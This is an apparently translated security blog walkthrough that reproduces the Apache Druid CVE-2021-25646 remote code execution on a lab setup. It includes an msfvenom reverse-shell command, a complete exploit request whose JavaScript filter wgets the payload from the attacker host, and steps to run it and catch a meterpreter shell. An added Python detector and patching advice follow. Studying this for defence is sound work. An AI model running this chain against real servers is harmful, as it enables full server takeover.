2025-01-18 Update From: SLTechnology News&Howtos (Network Security)
Shulou(Shulou.com)05/31 Report--
This article shows how the Apache Druid remote code execution vulnerability CVE-2021-25646 can be used to upload a Trojan program. The walkthrough is detailed; interested readers can follow along, and I hope it is helpful.
I. Overview of the vulnerability
1.1 Vulnerability background
Apache Druid is a column-oriented, open-source, distributed data store written in Java. It is designed to ingest large volumes of event data quickly and to serve low-latency queries on top of that data.
Apache Druid recently published a security update that fixes a remote code execution vulnerability (CVE-2021-25646).
1.2 Vulnerability description
Apache Druid can execute user-supplied JavaScript code embedded in various kinds of requests. This feature is intended for highly trusted environments and is disabled by default. However, in Druid 0.20.0 and earlier, an authenticated user can craft a JSON request that controls certain parameters and forces Druid to run the user-supplied JavaScript for that request. Because Apache Druid does not enable authentication by default, an attacker can exploit this to execute arbitrary code on the target machine and ultimately take control of the server.
1.3 Using MSF to generate a reverse-shell Trojan
The attacker machine used here is 192.168.159.131; the target machine is 192.168.159.139.
1. Use MSF to generate a reverse-shell Trojan. The command is: msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.159.131 LPORT=5555 -f elf > reverse.elf
Note: the target machine I use here is a 64-bit system, so I chose the x64 payload; for a 32-bit system choose x86.
2. Start a simple web server with Python on the attacker machine. The wget command executed later through the Apache Druid remote code execution vulnerability downloads the reverse.elf file generated by msf from this web server.
3. Start the MSF listener module with the following commands:
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set lhost 192.168.159.131
set lport 5555
run
1.4 Reproducing the vulnerability
1. Download Druid 0.19.0 from https://github.com/apache/druid/releases/tag/druid-0.19.0, as shown below.
2. Build the vulnerable Druid environment with Docker: extract the downloaded archive, enter the druid-druid-0.19.0/distribution/docker directory and run docker-compose up -d. When it finishes, visit http://192.168.159.139:8888.
3. Paste the following PoC into the Repeater module of Burp Suite. The command carried in the payload is wget http://192.168.159.131:888/reverse.elf, which downloads the reverse-shell Trojan from the web server started earlier onto the target machine.
POST /druid/indexer/v1/sampler HTTP/1.1
Host: 192.168.159.139:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/json;charset=UTF-8
Content-Length: 931

{
  "type": "index",
  "spec": {
    "type": "index",
    "ioConfig": {
      "type": "index",
      "inputSource": {"type": "http", "uris": ["https://druid.apache.org/data/example-manifests.tsv"]},
      "inputFormat": {"type": "tsv", "findColumnsFromHeader": true}
    },
    "dataSchema": {
      "dataSource": "sample",
      "timestampSpec": {"column": "timestamp", "missingValue": "2010-01-01T00:00:00Z"},
      "dimensionsSpec": {},
      "transformSpec": {
        "transforms": [],
        "filter": {
          "type": "javascript",
          "function": "function (value) {return java.lang.Runtime.getRuntime().exec('wget http://192.168.159.131:888/reverse.elf')}",
          "dimension": "added",
          "": {"enabled": "true"}
        }
      }
    },
    "type": "index",
    "tuningConfig": {"type": "index"}
  },
  "samplerConfig": {"numRows": 50, "timeoutMs": 10000}
}
4. Make the reverse.elf program downloaded onto the target machine executable. The command is: chmod a+x reverse.elf
5. Run the reverse.elf program with the following command: ./reverse.elf
6. MSF receives the reverse shell.
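From the defender's side, the request above has a recognisable shape: an ingestion spec posted to the sampler endpoint that contains a "javascript"-typed filter, plus an empty-key object that tries to enable JavaScript for that one request even though the feature is off by default. The following script is an added example, not code from the original article or from the Druid project. It assumes request logs are available as method, path and raw POST body (for instance from a reverse proxy in front of the Router on port 8888); the endpoint list, the log entries and both sample specs are constructed for the example, and the JavaScript function in the suspicious sample is a harmless placeholder because the detection keys on structure, not on what the script does.

```python
"""Added example (not from the original article): flag Druid ingestion
requests whose spec embeds JavaScript, the feature abused in CVE-2021-25646.

Assumptions, all constructed for this example: log entries are dicts with
method, path and raw POST body; endpoint list and sample bodies are mine.
"""
import json

# Endpoints that accept ingestion specs; the article's PoC posts to the sampler.
SPEC_ENDPOINTS = ("/druid/indexer/v1/sampler", "/druid/indexer/v1/task")


def find_javascript_nodes(node, path="$"):
    """Walk a parsed spec and return every object with "type": "javascript".

    Each hit records its JSON path and whether the object also carries the
    empty-key override ("": {"enabled": "true"}) seen in the article's PoC.
    """
    hits = []
    if isinstance(node, dict):
        if node.get("type") == "javascript":
            override = node.get("")
            hits.append({
                "path": path,
                "injected_config": isinstance(override, dict)
                and str(override.get("enabled")).lower() == "true",
            })
        for key, value in node.items():
            child = f"{path}.{key}" if key else f"{path}.<empty-key>"
            hits.extend(find_javascript_nodes(value, child))
    elif isinstance(node, list):
        for index, value in enumerate(node):
            hits.extend(find_javascript_nodes(value, f"{path}[{index}]"))
    return hits


def assess_request(method, path, body):
    """Classify one logged request: ignore / malformed / ok / suspicious / critical."""
    if method != "POST" or not path.startswith(SPEC_ENDPOINTS):
        return "ignore", []
    try:
        spec = json.loads(body)
    except json.JSONDecodeError:
        return "malformed", []          # specs should be valid JSON; worth a look on its own
    hits = find_javascript_nodes(spec)
    if not hits:
        return "ok", []
    if any(hit["injected_config"] for hit in hits):
        return "critical", hits         # JavaScript plus per-request enable override
    return "suspicious", hits           # any JavaScript spec is rare when the feature is off


def scan_requests(entries):
    """Run assess_request over log entries, dropping the ones that do not matter."""
    results = []
    for entry in entries:
        severity, hits = assess_request(entry["method"], entry["path"], entry["body"])
        if severity != "ignore":
            results.append((entry["path"], severity, [hit["path"] for hit in hits]))
    return results


# Constructed input block shared by both sample specs: inline data, CSV format.
_IO_CONFIG = {"type": "index",
              "inputSource": {"type": "inline", "data": "ts,added\n2010-01-01,1"},
              "inputFormat": {"type": "csv", "findColumnsFromHeader": True}}

# Constructed benign sampler spec: ordinary selector filter, no JavaScript.
BENIGN_SPEC = json.dumps({
    "type": "index",
    "spec": {"ioConfig": _IO_CONFIG,
             "dataSchema": {"dataSource": "sample", "timestampSpec": {"column": "ts"},
                            "transformSpec": {"transforms": [],
                                              "filter": {"type": "selector",
                                                         "dimension": "added", "value": "1"}}}},
    "samplerConfig": {"numRows": 50},
})

# Constructed spec shaped like the article's PoC: javascript filter plus the
# empty-key override. The function body is a harmless placeholder.
JS_OVERRIDE_SPEC = json.dumps({
    "type": "index",
    "spec": {"ioConfig": _IO_CONFIG,
             "dataSchema": {"dataSource": "sample", "timestampSpec": {"column": "ts"},
                            "transformSpec": {"transforms": [],
                                              "filter": {"type": "javascript",
                                                         "function": "function (value) { return true }",
                                                         "dimension": "added",
                                                         "": {"enabled": "true"}}}}},
    "samplerConfig": {"numRows": 50},
})

# Constructed proxy log: a health check, a normal sampler call, a PoC-shaped call.
SAMPLE_REQUESTS = [
    {"method": "GET", "path": "/status", "body": ""},
    {"method": "POST", "path": "/druid/indexer/v1/sampler", "body": BENIGN_SPEC},
    {"method": "POST", "path": "/druid/indexer/v1/sampler", "body": JS_OVERRIDE_SPEC},
]

if __name__ == "__main__":
    for path, severity, where in scan_requests(SAMPLE_REQUESTS):
        print(f"{severity:10} {path} {where}")
```

A "suspicious" result (JavaScript present but no override) is still worth triage, since the same filter type also reaches aggregators and extraction functions; a "critical" result is the article's pattern. Either way the durable fix is the version upgrade the article mentions, with authentication enabled in front of the Router rather than left at the default.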
II. Affected scope
Apache Druid 0.20.0 and earlier (see section 1.2).